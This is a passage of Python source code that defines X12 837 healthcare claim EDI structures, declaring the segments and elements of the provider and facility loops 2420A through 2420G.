data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "LIN13", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=13, codes=[], ), ), Element( "LIN14", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=14, codes=[], ), ), Element( "LIN15", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=15, codes=[], ), ), Element( "LIN16", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=16, codes=[], ), ), Element( "LIN17", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=17, codes=[], ), ), Element( "LIN18", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=18, codes=[], ), ), Element( "LIN19", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=19, codes=[], ), ), Element( "LIN20", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=20, codes=[], ), ), Element( "LIN21", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=21, codes=[], ), ), Element( "LIN22", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=22, codes=[], ), ), Element( "LIN23", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=23, codes=[], ), ), Element( "LIN24", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=24, codes=[], ), ), Element( "LIN25", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=25, codes=[], ), ), Element( "LIN26", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=26, codes=[], ), ), Element( "LIN27", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", 
"1", "48"), position=27, codes=[], ), ), Element( "LIN28", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=28, codes=[], ), ), Element( "LIN29", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=29, codes=[], ), ), Element( "LIN30", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=30, codes=[], ), ), Element( "LIN31", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=31, codes=[], ), ), ), Segment( "CTP", Properties( desc="Drug Quantity", position="4940", repeat="1", req_sit="R", syntax="P0405 C0607 C0902 C1002 C1103", ), Element( "CTP01", Properties( desc="Class of Trade Code", req_sit="N", data_type=("ID", "2", "2"), position=1, codes=[], ), ), Element( "CTP02", Properties( desc="Price Identifier Code", req_sit="N", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CTP03", Properties( desc="Unit Price", req_sit="N", data_type=("R", "1", "17"), position=3, codes=[], ), ), Element( "CTP04", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CTP05-01", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["F2", "GR", "ME", "ML", "UN"], ), ), Element( "CTP05-02", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=1, codes=[], ), ), Element( "CTP05-03", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CTP05-04", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CTP05-05", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( 
"CTP05-06", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=5, codes=[], ), ), Element( "CTP05-07", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "CTP05-08", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CTP05-09", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "CTP05-10", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP05-11", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CTP05-12", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=11, codes=[], ), ), Element( "CTP05-13", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "CTP05-14", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CTP05-15", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=14, codes=[], ), ), ), Element( "CTP06", Properties( desc="Price Multiplier Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CTP07", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=7, codes=[], ), ), Element( "CTP08", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "CTP09", Properties( desc="Basis of Unit Price Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP10", Properties( desc="Condition Value", req_sit="N", data_type=("AN", "1", "10"), position=10, codes=[], ), ), Element( "CTP11", Properties( desc="Multiple Price Quantity", req_sit="N", data_type=("N0", 
"1", "2"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Prescription or Compound Drug Association Number", position="4950", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["VY", "XZ"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2420A = Loop( "2420A", Properties( desc="Rendering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, 
codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="5050", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", 
data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420B = Loop( "2420B", Properties( desc="Purchased Service Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Purchased Service Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QB"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name 
Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Purchased Service Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", 
Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420C = Loop( "2420C", Properties( desc="Service Facility Location Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", 
Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="5250", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( 
desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420D = Loop( "2420D", Properties( desc="Supervising Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", 
Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", 
Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420E = Loop( "2420E", Properties( desc="Ordering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ordering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DK"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( 
desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ordering Provider Address", position="5140", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ordering Provider City, State, ZIP Code", position="5200", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Ordering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", 
data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "PER", Properties( desc="Ordering Provider Contact Information", position="5300", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( 
desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2420F = Loop( "2420F", Properties( desc="Referring Provider Name", looptype="", position="5000", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( 
"NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", 
"50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420G = Loop( "2420G", Properties( desc="Ambulance Pick-up Location", looptype="", position="5310", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", 